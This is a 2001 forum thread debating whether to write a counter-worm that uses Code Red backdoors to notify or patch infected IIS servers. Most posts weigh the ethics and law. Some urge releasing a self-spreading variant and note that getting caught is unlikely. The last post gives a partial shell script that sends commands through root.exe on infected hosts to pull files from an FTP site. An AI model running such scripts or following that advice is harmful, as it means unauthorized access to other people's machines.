by Inoshiro on Wed Aug 08, 2001 at 06:48:29 PM EST

We're still taught in driving courses here that we should not attempt to help people if we happen to be in the US -- unless we intend to be outside of the country the next day. Why? Because there is no federal law about helping (like there is here).

Much like a mix of vulnerable and patched machines, a patchwork of laws that does not guarantee safety just means that other places will teach avoidance to route around the brain damage.



--
[ イノシロ ]
[ Parent ]
different philosophies (none / 0) (#93)
by rebelcool on Wed Aug 08, 2001 at 07:28:19 PM EST

Then they are being taught incorrectly, sadly enough.

America has different philosophies about laws. Most things are left up to the states to take care of. Don't let all the big debates which revolve around places where the federal government has jurisdiction make you think otherwise.

COG. Build your own community. Free, easy, powerful. Demo site
[ Parent ]

Who are YOU kidding? (none / 0) (#72)
by kostya on Wed Aug 08, 2001 at 03:48:50 PM EST

All I have to say is that you are being very, very optimistic. As someone who has worked for large companies and helped high-profile ones shut "the barn door after all the horses are gone", I can say that they will not care one iota if you are the guy who did the original compromise or the "patch".

If you compromise their system to patch it, you have compromised their system. You have broken into their property and modified it without telling them. It's not a good idea, it isn't ethical, and on top of that, it is illegal--intentions or no.

Just because someone doesn't know they are infected doesn't mean they are clueless. Sure, they were sloppy and sure they were lazy--but that doesn't mean they are not able to track you down or hire someone who can. I offer the example of Tsutomu Shimomura--he got owned and then he nailed Mitnick. So even security experts can make mistakes or run stuff in improper ways.

Think about this: by patching the system, you will probably destroy or compromise any "forensic" data that could be used to track down or verify the original compromise. That leaves only you, and trust me, they will press you with everything they have--especially if they have lost money.

And, as the poster said, if your patch DOES cause a problem, you are really screwed. This isn't the Wild West anymore. Wake up.



----
Veritas otium parit. --Terence
[ Parent ]
They're criminals too. (none / 0) (#78)
by delmoi on Wed Aug 08, 2001 at 04:54:24 PM EST

Think about this: by patching the system, you will probably destroy or compromise any "forensic" data that could be used to track down or verify the original compromise. That leaves only you, and trust me, they will press you with everything they have--especially if they have lost money.

What? The attack would be in the logs just like it is on our machines. Why would a 'fix' delete the logs? That is pure hyperbole.

Besides, their machine is 'attacking' your machine, so they're breaking the law just as much as you would be.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
I don't know about that ... (none / 0) (#88)
by kostya on Wed Aug 08, 2001 at 06:33:42 PM EST

What? The attack would be in the logs just like it is on our machines. Why would a 'fix' delete the logs? That is pure hyperbole.

I said destroy or compromise, so you probably have a point about hyperbole (the idea that no info would be left is pretty absurd!). My point was that mucking around in a system that got compromised will probably help dirty the evidence even further--leaving them the freshest trail as the strongest. Whatever the real case (how much info is left unharmed), it's a bad, bad idea.

Besides, their machine is 'attacking' your machine, so they're breaking the law just as much as you would be.

Here I would have to disagree with you. A machine that is attacking or harassing another machine due to an exploit the owner doesn't know about is entirely different than the owner of the machine breaking into your machine on purpose. Whatever the intent, breaking into the exploited machine is just illegal. Period.

Now perhaps you could sue the exploited machine's owner for negligence and incompetence, getting back damages on lost bandwidth or time. It would be a tough case, requiring some serious payoff to be worth pursuing. That being said, you suing them for being an idiot versus them suing you for using their machine without permission through illegal means--I think they have a better case.

Is that fair? Eh, it depends on how you look at it. Long story short: this whole "challenge" is a very, very bad idea. As you'll remember, there was a similar worm for the L1on worm that patched the holes. Many people were nonplussed to have that thing mucking about in their system. Even if you document what you did, you are messing with someone else's machine--which isn't legal or ethical.



----
Veritas otium parit. --Terence
[ Parent ]
Interesting..... (none / 0) (#116)
by impto on Thu Aug 09, 2001 at 11:27:43 AM EST

So ignorance is bliss, huh?

So what if I didn't know that I had this script running on my box. What if my Linux distribution just happened to come with this Code Blue script. Would that put me in the same position as the people who have no idea that they have IIS running much less that they've been rooted by Code Red II?

Your argument for who has more right to sue is also interesting. It seems that you think that the retaliating script is using their machine more than they were in the first place. Just because a computer isn't vulnerable doesn't mean that an attack wasn't committed. The retaliating script doesn't create the holes in the system; it just uses the holes that the owner allowed, through ignorance or malice, to be created in the first place.

Furthermore the entire world of people who would ever do anything about infected servers has already. It's been on the news, all over the web, and certainly on Microsoft's Update page for a good long while. While altering a system's settings may not be the way to go, I do not think that sending the offender a notice is beyond the scope of ethical.

I am all for a notification of users. Although I don't know how much good it will do considering how obtuse the users who have these machines obviously are. However, you have changed my mind on the issue of fixing the problem.

impto

[ Parent ]

Confused over some points ... (none / 0) (#121)
by kostya on Thu Aug 09, 2001 at 02:36:01 PM EST

(sorry about length, I started and kept going ...)

So what if I didn't know that I had this script running on my box.

You could be accused of negligence. Again, it's not that you can't be held responsible, it's just that if my machine isn't causing you too much trouble (it's sending some CR port 80 attempts) and you hack back into it, I'm going to have a stronger case for harm since you actually violated the law.

In the states, negligence can be prosecuted, so there's a limit on how stupid you could be :-) ... thank God.

What if my Linux distribution just happened to come with this Code Blue script.

That one's easy--sue the distribution maker for negligence when you get sued--i.e. you could claim it wasn't your fault since you bought the product in good faith. Thus the reason for the extensive disclaimers ;-) But even with those, if a distribution didn't show due diligence, they'd have some major restitution to fork out.

Your argument for who has more right to sue is also interesting. It seems that you think that the retaliating script is using their machine more than they were in the first place.

No, that's not the basis of my argument ...

Just because a computer isn't vulnerable doesn't mean that an attack wasn't commited.

This is true, but I'm not sure how this relates to cracking their box (see next) ...

The retaliating script doesn't create the holes in the system it just uses the holes that the owner allowed, through ignorance or malice, to be created in the first place.

Now here we have a very interesting perspective ;-) By this logic, if I haven't been paying attention to the WU-FTP security updates for Red Hat, I lose all rights to keep my box private ... which I don't think you intended ;-)

In terms of legal and not legal, if a company found that you used their machine without their permission, they would base their case on that. It's not how you got in, but what you did--i.e. you used their equipment and resources without their explicit or implicit permission. That's trespassing (or insert some more accurate legal term).

What does this ultimately mean? I think it's pretty clear--if I am running a service, that can be taken as either explicit (if it's setup) or perhaps implicit permission to use that service. I.e. is a random user who pulls up your default apache page on your brand new broadband box violating the law? I would say probably not (who knows, lawyers are tricky). But if you took that apache service and exploited it to get root access, have you violated the law then? Yes.

I got into this issue once trying to notify a user. They didn't have any info up, but they had sendmail up. I telnetted to sendmail, queried the service and picked up the forward for root--and then I sent mail to him. He was incredibly pissed and accused me of all sorts of stuff and threatened me with the police. I politely argued that's what sendmail is for (that he had gotten mad over the real world event of me dropping by his house, reading his instructions to the mailman, and sending my mail to that address instead). He was a shady character (see below).

OTOH, if I had mounted his root via NFS and left him a big JPG of my smiling face with a message, I think he would have had more of a case against me or reason to be upset. Remember, the courts aren't computers--they don't blindly execute law. So they will use some common sense about intent and rights when they judge these cases. If you did something that clearly goes against the owner's rights, stupid or not, they will probably have a case against you.

In addition, I believe the anti-computer crime laws are pretty specific. They are in favor of the owner because they are the ones who need to be protected by the law (since they are the "weaker/more vulnerable" party). You and I do not have to crack boxes--it is not a God-given right, a physical need, or a business requirement. Therefore, why protect people who use your systems, good intentions or not?

While altering a system's settings may not be the way to go, I do not think that sending the offender a notice is beyond the scope of ethical.

There would be nothing wrong with notifying someone that their machine has tried to compromise your network. As a matter of fact, I do it regularly. I check my firewall logs looking for really suspicious stuff. If it comes from a computer I can trace back, I do some research; I find that most static IP attacks are compromised machines (unless the cracker is a moron--which is what I believe Mr. Angry from above was).

All that being said, I think that a law or a clarification needs to be made about port scanning. I use it as a diagnostic tool, and I usually don't use it on other machines until I'm pretty sure I have a big problem (out of courtesy to the ISP, the owner, etc). But port scanning is quickly becoming taboo. As it is, too many folks download nmap and think they have a right to scan whatever they want.



----
Veritas otium parit. --Terence
[ Parent ]
Some very good points. (none / 0) (#126)
by impto on Thu Aug 09, 2001 at 04:55:21 PM EST

However, you don't seem to see a conclusion that I and others are making.

There would be nothing wrong with notifying someone that their machine has tried to compromise your network. As a matter of fact, I do it regularly....If it comes from a computer I can trace back, I do some research;

Why do you see it as an issue to respond directly to Code Red II attempts on an individual's machine with an alert to that person through the holes that Code Red II makes? The announcement that would be made would not alter the compromised server's settings in any way, only let them know that they had been compromised. This method ensures that only people who have been compromised by the worm get the message and it doesn't take up much bandwidth (in researching the incident or otherwise) to do so.

impto

[ Parent ]

It's about ethics (4.00 / 1) (#128)
by kostya on Thu Aug 09, 2001 at 08:55:51 PM EST

Why do you see it as an issue to respond directly to Code Red II attempts on an individual's machine with an alert to that person through the holes that Code Red II makes?

There are half a dozen ways to get a hold of the owner of a machine. I think that cracking their machine serves no purpose short of looking like a smart aleck--the computer equivalent of "nanner, nanner, look what I did!"

Trust me, people are not at ease when you contact them. People whose machines I looked up via InterNIC still questioned me, asking how I got a hold of them. It's very violating for most--they perceive themselves as having more privacy and anonymity than they actually do.

So take that and then add to the fact that you are cracking their machine right under their nose. One, it isn't legal (you are using the machine illegally), two, it isn't ethical, and three, it's likely to make the person overreact and treat you like the enemy.

Sure it's cool to reach them by exploiting the security and writing a worm. But it's just not wise. I found poking around cool until I had enough people treat me with suspicion. Then I understood their position and sought more discreet ways.

If there is no other way to reach them, then contact their ISP. That's the legal, ethical, and boring way to do it. But it causes less headaches and avoids a lot of confusion.

Just because you can do something doesn't mean you should.



----
Veritas otium parit. --Terence
[ Parent ]
Maybe that's what these people need... (3.50 / 2) (#132)
by impto on Fri Aug 10, 2001 at 10:27:54 AM EST

...a wake up call.

It's very violating for most--they perceive themselves as having more privacy and anonymity than they actually do

They obviously don't realize that they are as vulnerable as they are. Maybe they need a little help getting acquainted to the net.

...you are cracking their machine right under their nose. One, it isn't legal (you are using the machine illegally)...

I remind you that this script is not doing the cracking. It is merely taking advantage of a 'service' that has been created by another 'program' running on the infected box (i.e. the root mappings that Code Red II instantiates). And if I access the default web page that IIS is running on most of these boxes, does that qualify as illegal use of their machine? Just because the user doesn't know about it, does it make it illegal, and if so, does that qualify them (the ones with legal copies, that is) for a class action suit against Microsoft for having IIS run as a service by default?

...two, it isn't ethical...

I don't think that a simple "Hey, how's it going, your machine has been 0wned!" is unethical. First, the aforementioned wake up call, and second, the undeniable viability of the crack because the message is sent from the same box that receives it. You are obviously not a believer in hacker ethics, and I don't fault you for that. But I do point back to the point I made that the script does not create the hole.

...and three, it's likely to make the person overreact and treat you like the enemy.

Overreact how? Hopefully, by installing the patch and/or reformatting their box. And them treating me like the enemy is the least of my worries. I have already stated my doubt as to their legal ground in this matter. My concern is that they leave their box 0wned and the script kiddies grab it and start DDoSing my favorite web site/me.

impto

[ Parent ]

Ok, one more time ;-) (none / 0) (#136)
by kostya on Fri Aug 10, 2001 at 01:11:24 PM EST

I remind you that this script is not doing the cracking. It is merely taking advantage of a 'service' that has been created by another 'program' running on the infected box (i.e. the root mappings that Code Red II instantiates).

Ok, you seem to be making a distinction between the act of "breaking open" a machine (i.e. installing additional services to circumvent security via an already existing hole in security) and the act of using the person's machine without explicit or implicit permission.

Now, if that's how you want to determine the ethics of the situation, that's fine--for you. But the courts and law enforcement won't give a rip what you think is ethical or legal. Which is to say, the argument of "I didn't break into your machine, it was already broken into when I got there" will not save you in any way, shape, or form.

It's about whether you have permission or authorization to be using the machine. Period. If you use existing security holes or ones created by CR/CRII, it does not matter one iota, you are still using the machine without permission--i.e. illegally.

Now you can do whatever you want. But you might want to give a read to sil's story before charging blindly ahead and assuming that good intentions guarantee you'll be understood and vindicated. In his case, he didn't even touch the machine. In our hypothetical case (God, for your sake it better be hypothetical), we are talking about actually using the machine, placing files on it, sending messages, whatever. If you do what you propose, you will be screwed legally.

IANAL, blah, blah, etc, etc--but I have had brief brushes with trying to secure boxes and notifying other admins. Trust me--you do not want to use their machine. Port scans can almost get you brought up on charges these days (legislation in some U.S. states has been proposed); what the hell will ACTUALLY using the machine look like?

Guilty as hell, that's what.

As for a wake up call, I wholeheartedly agree that people need to be educated. My friends get cable-modems and I ask if they have a firewall--and thus begins a long lecture on how they are going to get hosed. I keep telling clients about security, and many continue to not listen. At least two have contacted me later to help them lock down their systems or do audits after they realized they had been cracked.

People need to be educated. They need to wake up and realize the internet is not Utopia-land where everyone is nice and well-behaved. But I don't think using their machine to tell them that is the most "productive" method--not to mention legal or safe. An email with a link to the MS site/patch and an invitation to drop you a line if they need any help would be a much better solution.

But then maybe I have a different perspective. I have a lot to lose if I break the law--a wonderful wife, great job, big house, lots of gadgets. Perhaps it is in my best interest to be "safe" and err on the side of caution. Do as you think best, but think about it long and hard. A criminal record is going to ruin any hope of a career (again, read sil's story--stupidity as a teen pretty much screwed him in the end, and it wasn't even computer related). In the case of sil, someone needed to pay, someone's head needed to be on a platter, someone needed to go to jail. Do you really think it will matter that you did not perform the original exploit? If they have no one else to blame (can't trace CR), you are going to be the main focus of all their legal wrath.



----
Veritas otium parit. --Terence
[ Parent ]
This is probably going on to long.... (none / 0) (#140)
by impto on Fri Aug 10, 2001 at 04:14:44 PM EST

...but I enjoy a good argument/discussion.

The main reason I'm replying at this point is that you didn't even hit on my best point from the previous post.

Why is accessing the default web page set up by IIS when it runs as a service any different from accessing his root when I was not the one to open it? Theoretically, I could assume that he wanted to open his hard drive/operating system to the world. Or would it be just as illegal to access the default web page?

He doesn't know about either and I didn't cause either to be accessible to the outside world. Granted if I go in and damage his files/programs then I am at fault but how would sending him a message through the holes in his box be any different than viewing the web page that he doesn't know is being served up. Both are interactions between his computer and mine. Both suck up some of his resources. The only difference I can really see is that he would know about the message but I can't see how that's a bad thing.

I guess the action could be likened to SPAM inasmuch as it is not solicited, but not as much because it is a message targeted at one user who needs it.

I realize your point that it would be more tactful/legal/ethical and generally better to contact him through his ISP. However, the underlying point I'm driving at is, who is at fault for running the borked IIS server in the first place? Is it this guy who is not educated enough about his software or Microsoft for making it run as default in the first place?

impto

[ Parent ]

It is long, but it's soooo fun ;-) (none / 0) (#142)
by kostya on Fri Aug 10, 2001 at 04:47:48 PM EST

...but I enjoy a good argument/discussion.

Hehe, me too ;-)

Why is accessing the default web page set up by IIS when it runs as a service any different from accessing his root when I was not the one to open it? Theoretically, I could assume that he wanted to open his hard drive/operating system to the world. Or would it be just as illegal to access the default web page?

An excellent point. That's why I used "explicit or implicit" when talking about permission.

If some schmoe puts up a Linux box on a DSL line, it's probably going to have a default apache page up. Is accessing that page illegal? I'd say no--although some eager-beaver lawyer might make me eat those words in the future.

Webservers are for webserving--plain and simple. So back to my point about courts and intent--they are going to use their heads on this one. If you access a web server, it could be argued that webservers are for exactly that; no harm, no foul. But, if you tried to argue that because he didn't lock his machine down he was basically inviting you to peruse its contents, you'd be in a hot kettle of fish. No judge or jury will let that one stand, and if it was the basis for a defense, you'd be in trouble.

Confession time: during a very nasty "security takedown", I started getting my firewall hammered. I was notifying compromised servers, and I assume the crackers saw my probes and traffic on several machines and started putting two and two together to make five. So I "fought" back and started tracing back probes on my firewall in addition to the traffic logs I had from a client. I got a hold of a server in another state. It was probing my samba ports and nfs ports.

I did a drive-by via ping and traceroutes, then an nmap port scan, and found out I had an NT box. I see that the SMB share ports are up. I think to myself, "No frigging way they could be that stupid." For kicks, I fired smbclient at it and asked it to list its services. Wham! It gives me the ENTIRE domain: workstations, workstation descriptions, shares, etc.

Well, hell, at this point, it was obvious why they were cracked. So I go looking for contact info, but I couldn't find any. But I do see a link for this guy on the web page (an "employee") and I see his name attached to one of the workstations in the SMB listing. So I take his email off the site and send him an email explaining that he should check his system because it's not being nice to my system.

Well, my wording was friendly, but the fact that some stranger over 2,000 miles away knew which computer he was using and was talking about cracked machines made them assume I was threatening them. As it was, my attempts to convey the seriousness of the matter (and explaining that I had helped shut down a dozen other compromised servers) made me sound like the enemy and they started accusing me of all sorts of stuff. On top of that, this guy was THE BOSS, and he beat the tar out of his consulting firm, who in turn took it out on me.

Was I in the wrong: ethically, yes--even if I didn't realize it at the time. Just because some dork doesn't have enough brains to NOT expose his entire Windows network filesystem to me doesn't mean I should look at it. I should have seen the port open (via nmap), noted it, and sent an email explaining what I had seen. Mentioning that I could see their networks just made someone look like an ass.

Which, honestly, was my purpose. I couldn't believe how colossally stupid they had been. But my eagerness to be smart and clever did not help things. If I had realized this up front, I would have tried just a little harder, and I would have probably found the consulting company's contact info. As it was, I got someone in big trouble and for what? To make myself feel cool?

So now I'm a big "play nice" guy. Granted, the guy was totally at fault, but the anger I got on the phone was pretty intense. At that point, I realized that someone properly motivated with a lawyer could make my life a living hell--when I was doing the "right" thing! I took up the CYA approach from that point on, being extra careful and logging all my terminal sessions.

He doesn't know about either and I didn't cause either to be accessible to the outside world ... The only difference I can really see is that he would know about the message but I can't see how that's a bad thing.

Again, I'm all for sending him a message. Please do! But I think you should limit it to email. Something like "I got CR probes from your machine. I traced it back and found you had a CR web page up. Do you know that your machine is compromised?" is a helluva lot nicer to find than a message in the NT service log saying "Yo! You've got CR. I shut down IIS for you."

In theory, both are notification and both do no damage. But one will land you in jail (potentially) because you crossed the line from observing the machine to using the machine.

However, the underlying point I'm driving at is, who is at fault for running the borked IIS server in the first place? Is it this guy who is not educated enough about his software or Microsoft for making it run as default in the first place?

Clearly he is at fault for running a poorly managed server. And, if he did enough damage, you could sue him for negligence. But accessing his machine in "retaliation" isn't a good idea.

I know we all want to "school" the "lusers", but it is a bad idea career-wise, and it is really childish when you look at it (I admit that in myself).



----
Veritas otium parit. --Terence
[ Parent ]
Not the answer I wanted. (none / 0) (#143)
by impto on Fri Aug 10, 2001 at 05:20:03 PM EST

It was a nice story though.

I haven't used such a script and didn't really ever plan to. I just enjoy a good discussion as I guess I can fairly call what we just had, although I may have been a little overboard with my first post.

I still think that Microsoft should take a little of the blame for all these shenanigans.

BTW...I really like the layout and design of your web page. After reading all your posts I decided it wouldn't be too much trouble to check it out ;-).

At any rate, thanks for the verbal/keyboard work out.

impto

[ Parent ]

A much better solution. (5.00 / 1) (#86)
by harik on Wed Aug 08, 2001 at 06:18:43 PM EST

If you compromise their system to patch it, you have compromised their system. You have broken into their property and modified it without telling them. It's not a good idea, it isn't ethical, and on top of that, it is illegal--intentions or no.

So, obviously, the solution is that _YOU_ aren't the one to do it.

release another CR variant, one that patches the server, then puts a cgi in place of default.ida that "fixes" whoever attempts to connect to it.

seed a few of these here and there, and you'll see an exponential dropoff in CR infections. Since it's not self-propagating, it won't cause massive bandwidth problems. It simply kills any worm that attempts to connect to it.

Let's face it, nobody's figured out who launched CR1, or seeded the networks with CR2. So it's unlikely that you'll get caught.

--Dan

[ Parent ]

Not really. (2.25 / 4) (#87)
by kelkemesh on Wed Aug 08, 2001 at 06:31:55 PM EST

seed a few of these here and there, and you'll see an exponential dropoff in CR infections. Since it's not self-propagating, it won't cause massive bandwidth problems.

If it's not self-propagating, it will have only a linear effect on the infection - and until the infection starts to saturate the set of susceptible machines and ceases to grow exponentially, this countermeasure will just be a drop in the bucket.

Also, a countermeasure that propagates just to machines attempting infection won't cause bandwidth problems at all - it'll alleviate them by shutting down the infection vector of CR.

[ Parent ]
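
kelkemesh's point above (a fixed set of non-propagating "fixer" hosts only removes infections in proportion to how many infected hosts happen to probe them, so it barely dents the epidemic before saturation) can be checked with a small expected-value model. The block below is an added example, not code from the thread; every parameter is constructed (a 1,000,000-address scan space, 100,000 vulnerable hosts, 10 initial infections, 100 probes per infected host per step, 100 fixers), and the model is a deterministic mean-field approximation rather than a simulation of any real worm.

```python
"""Mean-field model of a random-scanning worm versus a fixed set of "fixer" hosts.

Added example for kelkemesh's argument; none of this is from the thread.
All parameters are constructed: a 1,000,000-address scan space, 100,000
vulnerable hosts, 10 initially infected, 100 probes per infected host per
step, and a handful of fixers that disinfect whoever probes them.
"""
import math


def simulate(address_space, vulnerable, infected, fixers, probes_per_step, steps):
    """Deterministic expected-value run; returns peak, final counts and history.

    Each infected host sends probes_per_step probes to uniformly random
    addresses. A probe that lands on a still-vulnerable host infects it; a
    probe that lands on a fixer gets the prober patched (and so immune).
    Fixers never scan, so they only act on hosts that come to them.
    """
    s, i, patched = float(vulnerable), float(infected), 0.0
    peak, history = i, []
    for _ in range(steps):
        probes = i * probes_per_step
        new_infections = min(s, probes * s / address_space)
        disinfected = min(i, probes * fixers / address_space)
        s -= new_infections
        i += new_infections - disinfected
        patched += disinfected
        peak = max(peak, i)
        history.append((round(s), round(i), round(patched)))
    return {"peak_infected": peak, "final_infected": i,
            "final_patched": patched, "history": history}


def cleanup_half_life(address_space, fixers, probes_per_step):
    """Steps for a saturated infected population to halve through fixers alone.

    Once no vulnerable hosts remain, the infected count shrinks by the factor
    (1 - probes_per_step * fixers / address_space) every step: the effect is
    proportional to the infected count and never accelerates.
    """
    rate = probes_per_step * fixers / address_space
    if rate >= 1.0:
        return 0.0
    if rate <= 0.0:
        return math.inf
    return math.log(0.5) / math.log(1.0 - rate)


# Constructed baseline parameters shared by both runs.
BASE = dict(address_space=1_000_000, vulnerable=100_000, infected=10,
            probes_per_step=100, steps=20)


def compare(fixers):
    """Run the worm with and without `fixers` and return both results."""
    return simulate(fixers=0, **BASE), simulate(fixers=fixers, **BASE)


if __name__ == "__main__":
    alone, with_fixers = compare(fixers=100)
    for label, run in (("no fixers", alone), ("100 fixers", with_fixers)):
        print(f"{label}: peak infected {run['peak_infected']:.0f}, "
              f"infected after {BASE['steps']} steps {run['final_infected']:.0f}")
    print(f"half-life of a saturated infection with 100 fixers: "
          f"{cleanup_half_life(1_000_000, 100, 100):.1f} steps")
```

With these numbers the worm saturates all 100,000 vulnerable hosts within four steps whether or not the 100 fixers exist; afterwards the fixers shave about 1% off the infected population per step, so halving it takes roughly 69 steps. That is the "drop in the bucket" kelkemesh describes: a countermeasure that only acts on hosts probing it is a constant-rate drain, while the worm's growth is exponential until it runs out of victims.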

BIG MONEY (none / 0) (#154)
by b0fh on Wed Aug 15, 2001 at 10:14:43 PM EST

So, can I sue $BIGMONEY for my wasted bandwidth? NO, because I don't even live in the States (where $BIGMONEY prolly is ;-). All I can do is sit down and suffer from it.
My will is to simply destroy those machines (maybe having machines totally screwed up would make people open their eyes on how BAD M$ software is, and how their policy of "scripting everywhere" and "enable all that useless crap by default" is a BAD THING(TM)). Maybe it can even make people start looking for a better product (apache?) when it comes to WWW serving.
Of course, destroying machines is also bad, so we, as responsible people, don't do that (but I bet there are people doing that and laughing their asses off). Guess I'm simply stuck with it then. I don't see this stopping by itself with that whole crowd of winlusers out there running their pirate copies of windows and not having a clue...


--
--
"Contrary to popular belief, UNIX is user-friendly. It just happens to be selective on who it makes friendship with"
[ Parent ]
Vi (2.71 / 7) (#66)
by spinfire on Wed Aug 08, 2001 at 02:46:02 PM EST

In the poll, you've got EMACS but no Vi! shame shame shame on you, you, you, editor fascist you!

Freelance Hacker. spinfire on FooNET.
Not possible. (2.20 / 5) (#71)
by gblues on Wed Aug 08, 2001 at 03:43:19 PM EST

There's no way this is going to work.

For Code Red I computers, the best you can hope to do is reboot them. Of course, they'll get hit again within a few seconds, so this is a waste of time in the extreme.

For Code Red II computers, you need to be able to:

  1. modify the registry to remove the virtual paths to the root directories
  2. delete the bogus c:\explorer.exe
  3. delete all copies of root.exe
  4. patch IIS to prevent another exploit
  5. reboot the computer.
Good luck, especially since the root.exe used to get in won't be deleted (you'd need to somehow arrange for it to be deleted during the reboot). Not to mention that using a remote exploit to gain unauthorized access is highly illegal, even if the intention was good.

How did this story get posted, much less on the first page??

Nathan


... although in retrospect, having sex to the news was probably doomed to fail from the get-go. --squinky
Not really that hard. (3.50 / 2) (#76)
by delmoi on Wed Aug 08, 2001 at 04:50:04 PM EST

modify the registry to remove the virtual paths to the root directories

Not very hard at all

delete the bogus c:\explorer.exe

"Del C:\explorer.exe"

delete all copies of root.exe (you'd need to somehow arrange for it to be deleted during the reboot)

FileCopyEx is your friend

patch IIS to prevent another exploit

Download the patch and install it. Or just delete default.ida.

reboot the computer.

And that's supposed to be hard?
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
re: "Del C:\explorer.exe" (none / 0) (#118)
by Garc on Thu Aug 09, 2001 at 12:12:12 PM EST

This will most likely give you some sort of a sharing violation. On the machines I've seen infected, the bogus explorer had to be stopped before it could be deleted. You can open up task manager, and kill the process that has only 1 thread. Then you may delete c:\explorer.exe. I don't know how much this changes the "hardness" of it, b/c I've never tried to kill a process in NT/win2k w/o the task manager.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

Hrm,... (none / 0) (#79)
by QuoteMstr on Wed Aug 08, 2001 at 04:55:42 PM EST

This may seem strange, but why not just infect Code Red I infected computers with Code Red II so you can patch them?

[ Parent ]
Very Interesting Social Impact (3.00 / 1) (#74)
by Mad Hughagi on Wed Aug 08, 2001 at 04:40:00 PM EST

Regardless of the legality and/or ethical basis for writing this script, it is interesting to see that Scott Robinson's comment is rated very high while most of the shouting seems to be against this effort.

If you do write a successful "Code Blue" script, and it does not infringe on the majority of people to the degree where they feel threatened, it could very well make you one of the most famous people in western tech-culture. If you did it anonymously at least you would have the personal satisfaction that you implemented a very influential immune system type response on the net.

I'm all for it. If a machine is going to try to fuck you over, and if the operator's only saving grace is negligence or ignorance, then they should have no qualm with being dealt with in a quick and well-intended response.

Let 'er rip, Cheers from the Hughagi Quarter.


HUGHAGI INDUSTRIES

We don't make the products you like, we make you like the products we make.

Wild West (none / 0) (#123)
by squee on Thu Aug 09, 2001 at 03:21:01 PM EST

The internet is like the Wild West, and "Code Blue" is vigilantie* Justice.

Im a formin' a lynch mob and goin' to string up the Redmond Posse!


(I do not condone mob rule and the death penalty, but computer negligence should be a crime like any other negligence).

*i wish k5 had a spellcheck

[ Parent ]
Interesting Challenge (3.00 / 1) (#84)
by xriso on Wed Aug 08, 2001 at 05:44:30 PM EST

I have already considered doing this, but I cannot proceed without more information on the NT/2000 boot process. Does it have an autoexec.bat?

The way I would prefer is the following:

Set up boot process so that it displays the following message, and waits for a key, before the web server is started:
Your computer is vulnerable to the Code Red or CodeRedII worm. Go to http://www.incidents.org for more information. This message will only display once, unless it is detected that you are still vulnerable.

Press any key to continue...

This would be simple and effective. It stops the infection process (web server is not running), and gets the administrator's attention. If one really wanted to be nasty, one could integrate the propagation code with this, so that it spreads all over the net, with a 2-hour period between infection and reboot. For anonymity, you could simply make your worm the same size as CRII and access logs couldn't tell the difference! (or maybe they could - I don't know much about IIS)
--
*** Quits: xriso:#kuro5hin (Forever)

This is a very good idea. (5.00 / 1) (#92)
by Mad Hughagi on Wed Aug 08, 2001 at 07:01:26 PM EST

The only ethical hanging point is that you would be running software on someone else's machine without their prior consent, but in this case I think propagation of a white-hat script would definitely do a lot to further the concept of a "hacker" or "cracker" in today's society.

I liken the analogy to a car recall. While CR2 doesn't have quite the same ability to cause damage as faulty radials, it does have the same potential for being fixed, and if M$ isn't going to do anything about it I think concerned members of the society should do what they can to remedy the situation.

It's about time M$ started getting a bit more liable for their software, if they are going to sell it for profit. Imagine Ford realized that its key mechanism on the ignition could start with any key? They would have nothing against someone showing up and in one fell swoop fixing all of the broken mechanisms in the most efficient means possible.

To say that this sort of solution is unethical is an outrage to the betterment of society as a whole. We all use and share the internet, anything that interferes with its operations should be dealt with through the same concern that we would have if any other part of our infrastructure was damaged. What's that? Someone let a giant bulldozer loose on the interstate?

The only difference here is that it is a well-intentioned individual that would be solving the problem as opposed to the government.


HUGHAGI INDUSTRIES

We don't make the products you like, we make you like the products we make.
[ Parent ]

picking nits (none / 0) (#95)
by shoeboy on Wed Aug 08, 2001 at 08:17:01 PM EST

I have already considered doing this, but I cannot proceed without more information on the NT/2000 boot process. Does it have an autoexec.bat?

No, it does not. All configuration info is either in boot.ini (very minimal) or in the registry. Furthermore, during the text mode (blue screen of startup) part of the startup process, only NT native api applications can run. You need microsoft's driver development kit to write native api apps and the api is not documented anywhere unless you sign a big NDA and give Microsoft a lot of money. You could display a message that way, but it's just not worth it. Once you're into gui mode you can run win32 apps and send popups, but they won't be visible until someone logs on to the box. You could always change the default background from green to a .bmp with your message though. Probably the best method of getting someone's attention.

--Shoeboy
No more trolls!
[ Parent ]

hrm (none / 0) (#96)
by xriso on Wed Aug 08, 2001 at 08:37:56 PM EST

At first I was considering a boot-sector thingy, as those are pretty easy to make, but then I realised that some BIOSes complain when it is altered. Then again, that would also serve as a notification that some sort of viral activity was taking place.

That background .bmp sounds like a neat idea. Harmless, effective, simple, and reasonably small.
--
*** Quits: xriso:#kuro5hin (Forever)
[ Parent ]

gpl (2.00 / 4) (#99)
by ShrimpX on Wed Aug 08, 2001 at 09:17:51 PM EST

I've been thinking about this for a while... I think that we should write a worm that knows every possible windows "bad" worm/virus, including VB scripting vulnerabilities, and fixes the majority of existing bugs on win machines cleanly and nicely.

And then license it under the GPL and never launch it.

Though this is not physically possible, it would be interesting to see MS unable to clean up Windows because they refuse to open source.

File download script, etc. (4.00 / 3) (#107)
by nebby on Thu Aug 09, 2001 at 02:39:31 AM EST

The night Code Red 2 came out I stayed up with some Mountain Dew to see if I could come up with a way to fix these servers. First of all, something people have failed to mention is if they've managed to actually get IIS to shut down. I can't get it to work, it simply stays up no matter what I try ("net stop w3svc," etc.) I think root.exe has restricted permissions which do not allow it to:

- Access the desktop (so all these neat things which pop up web pages have not been working, sorry guys)
- Stop/start services
- Access files outside of the current directory

This is what I've been able to guess from just messing with it remotely, I don't have an infected box to test. I read in /. comments others have confirmed these things.

It can run other programs. I am not going to put any more time into this, but I figured I might as well post what I did get working, a file download script which can be used to download files from an ftp site to the infected server. I was using this to attempt to download and execute shutdown.exe from the NT service packs, as well as the IIS patches, but they didn't seem to work when I ran them. The downloads work though, so feel free to use this in whatever pursuits you find necessary, though I can't say I think it's a good idea for you legally :)

#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh [infectedIP] [file]
#
# Please set the $FTP and $DIR values to
# the ftp and directory of the patch and shutdown repository
# The default ones are set to ftp.yourftpsitegoeshere.com and /your/directory
# The percent encoding is a double check to make sure no funny NT commandline stuff causes it to break

FTP="ftp%2eyourftpsitegoeshere%2ecom"
DIR="%2fyour%2fdirectory"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
